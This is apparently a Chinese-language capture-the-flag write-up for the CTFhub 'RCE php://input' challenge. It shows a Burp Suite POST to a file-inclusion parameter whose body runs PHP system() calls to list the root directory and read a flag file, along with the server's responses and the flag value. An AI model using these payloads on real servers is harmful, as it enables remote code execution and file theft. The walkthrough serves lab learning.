当前位置: 首页 > news >正文

CTFhub-RCE-php://input

news 2025/8/8 17:12:20

我们需要使用php://input来构造发送的指令
查看phpinfo,找到一下字段
在这里插入图片描述
证明是可以使用php://input

1.   使用Burpsuite抓包并转至Repeater

2. 构造包

方法:POST
目标:/?file=php://input
Body:<?php system("ls /"); ?>

响应:

HTTP/1.1 200 OK
Server: openresty/1.21.4.2
Date: Mon, 13 Nov 2023 08:59:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 178
Connection: close
X-Powered-By: PHP/5.6.40
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Methods: *

bin
boot
dev
etc
flag_13803
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

<hr>
i don't have shell, how to get flag? <br>
<a href="phpinfo.php">phpinfo</a>

3. 使用cat访问flag_xxx
<?php system("cat /flag_13803")?>

flag: 
ctfhub{3dca56f1cd6b532d39ac2bde}

http://www.lryc.cn/news/228555.html

相关文章:

  • RISC-V处理器设计(五)—— 在 RISC-V 处理器上运行 C 程序
  • 【PIE-Engine 数据资源】全球250米LAI产品
  • vcomp120.dll丢失怎么办?vcomp120.dll丢失的解决方法分享
  • linux下使用Docker Compose部署Spug实现公网远程访问
  • 【STM32 CAN】STM32G47x 单片机FDCAN作为普通CAN外设使用教程
  • Apache Log4j2漏洞
  • 超级干货:光纤知识总结最全的文章
  • PyCharm因安装了illuminated Cloud插件导致加载项目失败
  • 微服务拆分的一些基本原则
  • Ubuntu取消sudo的输入密码
  • 基于ubuntu22.04手动安装openstack——2023.2版本(最新版)的问题汇总
  • 如何入门学习黑客技术?如何选择编程语言?如何选择适合黑客的操作系统?
  • 教育局档案室智慧档案库房建设方案
  • 智慧城市数据中台建设方案:PPT全文51页,附下载
  • 计算复杂性理论(一)图灵机
  • VM虚拟机只有一个C盘怎么添加硬盘新分区盘符
  • 堆排序(大根堆、小根堆)
  • 操作系统专栏 学习导航or使用说明
  • 计算机毕业设计选题推荐-课程学习微信小程序/安卓APP-项目实战
  • OracleLinux9 安装 fcgiwrap 并添加 selinux 规则以在 nginx 调用
  • Django框架
  • 用C语言来实现冒泡排序
  • flink的副输出sideoutput单元测试
  • 使用Inis搭配内网穿透实现Ubuntu上快速搭建博客网站远程访问
  • 基于蝴蝶算法优化概率神经网络PNN的分类预测 - 附代码
  • flink的KeyedBroadcastProcessFunction测试
  • 【pytorch深度学习】torch-张量Tensor
  • odoo16前端框架源码阅读——rpc_service.js
  • Nat. Med. | 成年人的城市生活环境对心理健康的影响
  • stm32 WIFI模块_8266使用